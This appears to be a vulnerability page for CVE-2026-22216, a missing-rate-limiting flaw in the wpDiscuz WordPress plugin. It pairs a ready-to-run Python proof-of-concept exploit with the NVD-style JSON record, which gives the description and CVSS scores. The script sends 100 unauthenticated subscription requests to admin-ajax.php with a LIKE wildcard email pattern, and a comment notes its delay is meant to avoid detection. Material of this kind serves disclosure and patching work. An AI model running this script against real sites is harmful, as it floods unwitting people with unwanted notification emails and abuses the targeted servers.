CVE-2026-22216

import requests import time # CVE-2026-22216 PoC - wpDiscuz Missing Rate Limiting # Target: WordPress site with wpDiscuz plugin < 7.6.47 TARGET_URL = "http://target-wordpress-site.com" AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Target post ID to subscribe notifications TARGET_POST_ID = "123" # Target email(s) to subscribe (can use wildcard pattern) TARGET_EMAIL = "user%@target.com" def subscribe_email(post_id, email): """Send subscription request to wpDiscuz endpoint""" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } data = { "action": "wpdAddSubscription", "postId": post_id, "email": email } try: response = requests.post(AJAX_ENDPOINT, data=data, headers=headers, timeout=10) return response.status_code, response.text except requests.exceptions.RequestException as e: return None, str(e) def exploit(): """Exploit missing rate limiting to subscribe multiple emails""" print(f"[*] Starting CVE-2026-22216 exploitation") print(f"[*] Target: {TARGET_URL}") print(f"[*] Subscribing: {TARGET_EMAIL}") # Send multiple requests (no rate limiting in place) num_requests = 100 for i in range(num_requests): status, resp = subscribe_email(TARGET_POST_ID, TARGET_EMAIL) if status: print(f"[+] Request {i+1}/{num_requests} - Status: {status}") time.sleep(0.1) # Small delay to avoid immediate detection print(f"[*] Exploitation completed. {num_requests} requests sent.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-22216", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:11.653", "lastModified": "2026-03-17T11:43:07.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wpDiscuz before 7.6.47 contains a missing rate limiting vulnerability that allows unauthenticated attackers to subscribe arbitrary email addresses to post notifications by sending POST requests to the wpdAddSubscription handler in class.WpdiscuzHelperAjax.php. Attackers can exploit LIKE wildcard characters in the subscription query to match multiple email addresses and generate unwanted notification emails to victim accounts."}, {"lang": "es", "value": "wpDiscuz anterior a la versión 7.6.47 contiene una vulnerabilidad de falta de limitación de tasa que permite a atacantes no autenticados suscribir direcciones de correo electrónico arbitrarias a notificaciones de publicaciones enviando solicitudes POST al gestor wpdAddSubscription en class.WpdiscuzHelperAjax.php. Los atacantes pueden explotar caracteres comodín LIKE en la consulta de suscripción para hacer coincidir múltiples direcciones de correo electrónico y generar correos electrónicos de notificación no deseados a cuentas de víctimas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-799"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpdiscuz/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wordpress.org/plugins/wpdiscuz/#developers", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/wpdiscuz-before-no-rate-limiting-on-subscription-endpoints-with-like-wildcard-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}